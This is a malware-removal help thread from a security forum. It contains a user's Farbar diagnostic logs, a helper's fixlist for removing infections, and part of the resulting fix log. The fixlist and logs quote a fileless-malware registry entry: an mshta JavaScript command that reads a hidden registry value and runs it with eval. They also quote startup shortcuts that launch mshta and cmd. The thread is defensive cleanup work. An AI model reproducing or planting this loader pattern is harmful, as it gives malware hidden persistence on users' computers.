FirewallRules: [{0658E516-9013-47BE-8F76-8059D8D5316C}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{36A31D8F-C159-4294-9BC7-9ED9282550BA}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{19C505A9-AF09-4D56-B2A1-80D01682EEB2}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{0B10C027-D4E2-4C06-B43B-92E0276185A9}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{BE229607-8693-4B64-8D52-9720B6991EAA}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{67ACFD66-A831-4006-B7A6-74F0D069A9A1}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{8435976E-B506-4E74-A47D-E58D1B85FCF2}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{4CBFD5A1-8E3C-406C-8CC9-61AB2404648E}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposid01.exe
FirewallRules: [{2483AB2C-6E96-4355-8E37-5DDE650DBA84}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposid01.exe
FirewallRules: [{38335553-90E7-488E-93B7-02788E0661FD}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqscnvw.exe
FirewallRules: [{EF04561E-A5A8-4FD7-9A68-9968A587C105}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqscnvw.exe
FirewallRules: [{21CF1C03-CB9C-4F16-84CC-9DE58493BCED}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{68CA33E2-B1CD-49B6-99F7-F9010EAED339}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{F5C7AC42-A4C0-4B75-97DC-BE953DDE7F9F}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{5B10FA1B-7EF8-4410-85B8-3F48F236D6E4}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{55E9ABC8-2771-47EA-990F-B4B7C56B5842}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\HpqPhUnl.exe
FirewallRules: [{4F4E63D2-BCB6-46E8-A921-77B9573AE84A}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\HpqPhUnl.exe
FirewallRules: [{655593D4-F8DA-4619-91AD-A9C3EF0C896C}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{8D16E8B9-396F-49FF-88BB-39FA0800E58F}] => (Allow) C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoews01.exe
FirewallRules: [TCP Query User{BC969F2E-A26A-41A5-9DE5-C4110098E548}C:\program files\infogrames\dirt track racing 2\dtr2.exe] => (Allow) C:\program files\infogrames\dirt track racing 2\dtr2.exe
FirewallRules: [UDP Query User{EE228C6A-765F-40A2-8799-E28A1E576A7E}C:\program files\infogrames\dirt track racing 2\dtr2.exe] => (Allow) C:\program files\infogrames\dirt track racing 2\dtr2.exe
FirewallRules: [TCP Query User{224A8567-6F09-4172-BF66-8F1CFBB8E86C}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{416CFB8B-A0F2-4A8F-BEA2-527B543C98E5}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{099FB426-766F-41DE-8E7A-B7549FEB7E7E}C:\program files\google\google earth\client\googleearth.exe] => (Block) C:\program files\google\google earth\client\googleearth.exe
FirewallRules: [UDP Query User{F7C915C2-6410-44A6-A2B9-CFFB27629770}C:\program files\google\google earth\client\googleearth.exe] => (Block) C:\program files\google\google earth\client\googleearth.exe
FirewallRules: [TCP Query User{491617E7-0793-4C55-A15B-E6D5CDE1EBF6}C:\program files\google\google earth\plugin\geplugin.exe] => (Block) C:\program files\google\google earth\plugin\geplugin.exe
FirewallRules: [UDP Query User{85E67114-48A6-4C6A-965A-E32AE5B6D14F}C:\program files\google\google earth\plugin\geplugin.exe] => (Block) C:\program files\google\google earth\plugin\geplugin.exe
FirewallRules: [{BF31F21F-0EB8-416F-A866-F6252A745B55}] => (Allow) LPort=80
FirewallRules: [{A67D7EC0-5595-427E-8B27-ABE80338FD44}] => (Allow) LPort=80
FirewallRules: [{F33D4EFF-4373-4554-8761-4F60032EDB9F}] => (Allow) LPort=80
FirewallRules: [TCP Query User{4AC79FDD-F559-4790-9260-684AA55654F1}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [UDP Query User{D1829EEA-CF90-4F18-B52C-906A22ACFB7D}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [{15FDA646-0B71-48E0-8BA5-6037E4CB6CAE}] => (Allow) C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{F65AE6DE-2C42-4C88-A236-1D181D9F052D}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [UDP Query User{DB0FFD34-767C-46D9-9EC9-7A645BBE055E}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [{2230D923-9586-4FD1-9A34-FB6FA2C9159B}] => (Allow) C:\Users\Pat\AppData\Roaming\Zoom\bin\Zoom.exe
FirewallRules: [{7DCA678F-6BA9-46D4-AA03-1B58BB3186B2}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{B7C74AE3-D54C-4309-9D2C-0602DE9D8E15}] => (Allow) LPort=2869
FirewallRules: [{9ABD0812-041B-4669-8F2A-16E5B0DD6360}] => (Allow) LPort=1900
FirewallRules: [{7F064504-8E36-4190-A8C2-13D021004099}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{ED75043D-726B-4E32-9490-AB8361B2CF8B}] => (Allow) C:\Program Files\Windows Live\Mesh\MOE.exe
FirewallRules: [{0A5E2D66-2F3B-44CC-91A0-DC468677F0E0}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
FirewallRules: [{F62E029E-9C15-4B37-8F6C-9655C9E7EAB2}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{B93AE606-A249-4038-A923-DCE3A6B2207D}] => (Allow) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{8FC61C2C-1212-428D-A4CA-C180361DED07}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [UDP Query User{A277474D-BFFA-41C4-BE2C-3294C697E6D5}C:\program files\real\realplayer\realplay.exe] => (Block) C:\program files\real\realplayer\realplay.exe
FirewallRules: [{85A8648F-58AB-481A-BE30-D005A29E1C93}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [TCP Query User{A03766C7-A7DC-40C7-A34B-7500CC029044}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{FA1BA084-C12A-4B31-9844-4D9587BA0A41}C:\users\pat\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pat\appdata\local\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{51D0DA18-EA08-4608-90AD-1DB33B4C78E4}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [UDP Query User{415033F3-1E64-4C0B-B71B-82BB270B94A5}C:\program files\tams11\games\farkle\farkle.exe] => (Block) C:\program files\tams11\games\farkle\farkle.exe
FirewallRules: [TCP Query User{B2FD4157-2546-4E88-99D2-9045BAB44F9D}C:\program files\itunes\itunes.exe] => (Block) C:\program files\itunes\itunes.exe
FirewallRules: [UDP Query User{3D200F78-76DE-4EB2-8692-8C6CE30BB50C}C:\program files\itunes\itunes.exe] => (Block) C:\program files\itunes\itunes.exe
 
==================== Restore Points =========================
 
13-10-2016 05:59:13 AA11
25-10-2016 11:08:25 WinThruster Backup
29-10-2016 13:33:38 Scheduled Checkpoint
30-10-2016 06:36:51 Windows Update
01-11-2016 18:30:41 JRT Pre-Junkware Removal
03-11-2016 11:19:12 AA11
03-11-2016 11:22:37 AA11
03-11-2016 11:30:08 Removed Bing Bar
03-11-2016 11:54:18 Removed Bonjour
03-11-2016 11:56:28 Removed Browser Address Error Redirector.
03-11-2016 12:45:55 Removed QuickTime
03-11-2016 14:51:02 Removed Windows Live Mesh ActiveX Control for Remote Connections
03-11-2016 14:52:57 Removed Yahoo! Music Jukebox.
03-11-2016 15:00:46 Configured Camera Access Library
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/03/2016 03:07:17 PM) (Source: MsiInstaller) (EventID: 11316) (User: Pat-PC)
Description: Product: BlackBerry Desktop Software 4.3 -- Error 1316.The specified account already exists.
 
Error: (11/03/2016 03:00:43 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {07483cd7-8c2c-4f16-80ba-df154c47cdd5}
 
Error: (11/03/2016 12:59:00 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 12:59:00 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 11:21:42 AM) (Source: MsiInstaller) (EventID: 11310) (User: Pat-PC)
Description: Product: AdAwareInstaller -- Error 1310. Error writing to file: C:\Config.Msi\1620480.rbf.  System error 5.  Verify that you have access to that directory.
 
Error: (11/03/2016 04:59:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/03/2016 04:59:32 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Windows\Installer\{C8E8D2E3-EF6A-4B1D-A09E-7B27EBE2F3CE}\recordingmanager.exe".
Dependent Assembly rpshellextension.1.0,language="&#x2a;",type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/02/2016 08:18:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application esetonlinescanner_enu (1).exe, version 2.0.12.0, time stamp 0x57ac3e59, faulting module esetonlinescanner_enu (1).exe, version 2.0.12.0, time stamp 0x57ac3e59, exception code 0xc0000005, fault offset 0x001b50f3,
process id 0x1518, application start time 0x01d2353c370667d7.
 
Error: (11/02/2016 06:10:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16819, time stamp 0x2a425e19, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x0ad948d8,
process id 0x1844, application start time 0x01d2356ea9d385e7.
 
Error: (11/02/2016 11:54:18 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program esetonlinescanner_enu.exe version 2.0.12.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 1d94
Start Time: 01d2352a27e11b1d
Termination Time: 122
 
 
System errors:
=============
Error: (11/04/2016 09:01:46 AM) (Source: WMPNetworkSvc) (EventID: 14344) (User: )
Description: A new media server was not initialized because WMCreateDeviceRegistration() encountered error '0xc00d2711'. The Windows Media DRM components on your computer might be corrupted. Verify that protected files play correctly in Windows Media Player, and then restart the WMPNetworkSvc service.
 
Error: (11/04/2016 09:01:45 AM) (Source: WMPNetworkSvc) (EventID: 14344) (User: )
Description: A new media server was not initialized because WMCreateDeviceRegistration() encountered error '0xc00d2711'. The Windows Media DRM components on your computer might be corrupted. Verify that protected files play correctly in Windows Media Player, and then restart the WMPNetworkSvc service.
 
Error: (11/04/2016 09:01:15 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Media Player Network Sharing Service service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/04/2016 09:01:15 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Media Player Network Sharing Service service to connect.
 
Error: (11/04/2016 08:59:14 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The HP CUE DeviceDiscovery Service service terminated with the following error: 
Unspecified error
 
Error: (11/04/2016 08:59:12 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The HP CUE DeviceDiscovery Service service hung on starting.
 
Error: (11/04/2016 08:58:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Pml Driver HPZ12 service terminated with the following error: 
The specified module could not be found.
 
Error: (11/04/2016 08:58:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Net Driver HPZ12 service terminated with the following error: 
The specified module could not be found.
 
Error: (11/04/2016 08:58:42 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
 
Error: (11/04/2016 08:58:41 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
 
 
CodeIntegrity:
===================================
  Date: 2016-11-04 10:07:28.528
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:26.351
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:22.726
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:18.857
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:15.977
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:11.836
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:08.728
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:07:06.441
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:04:41.038
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-11-04 10:04:36.969
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Genuine Intel® CPU 2140 @ 1.60GHz
Percentage of memory in use: 66%
Total physical RAM: 3069.45 MB
Available physical RAM: 1028.95 MB
Total Virtual: 5055.71 MB
Available Virtual: 2462.33 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:222.79 GB) (Free:99.03 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:3.89 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.8 GB) (Disk ID: D8000000)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=222.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

 

 



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,741 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:15 AM

Posted 06 November 2016 - 11:07 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
C:\Users\Pat\AppData\Local\Temp\a.txt
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

ADOBE READER
http://get.adobe.com/reader/
Before your download I suggest you unckeck the box on the top right "Yes, install McAfee Security Scan Plus - optional" this is not required if you are not a McAfee subscriber. While the installation is in progress you can also deny the installation of any other programs that may be suggested.
<<<>>>

ADOBE SHOCKWARE

Navigate to this page and follow the instructions to get the latest version.
https://www.adobe.com/shockwave/welcome/

=====

Remove these old versions via the Control Panel > Programs > Programs and Features.
Adobe Reader X (10.1.16) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM\...\Adobe Shockwave Player) (Version: 11 - Adobe Systems, Inc.)

===

Please post the Fixlog.txt file and let me know what problem persists.

#3 pkight

pkight
  • Topic Starter

  • Members
  • 29 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Murrieta, CA
  • Local time:02:15 AM

Posted 06 November 2016 - 04:29 PM

Finished all the tasks and the fixlog.txt is listed below.  

 

The "svchost" is still running about 50% of the cpu.  The "regsvr32" is not showing up on Task Manager now.  

 

Here is the fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 06-11-2016
Ran by Pat (06-11-2016 10:41:30) Run:1
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Loaded Profiles: Pat (Available Profiles: Pat)
Boot Mode: Normal
 
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
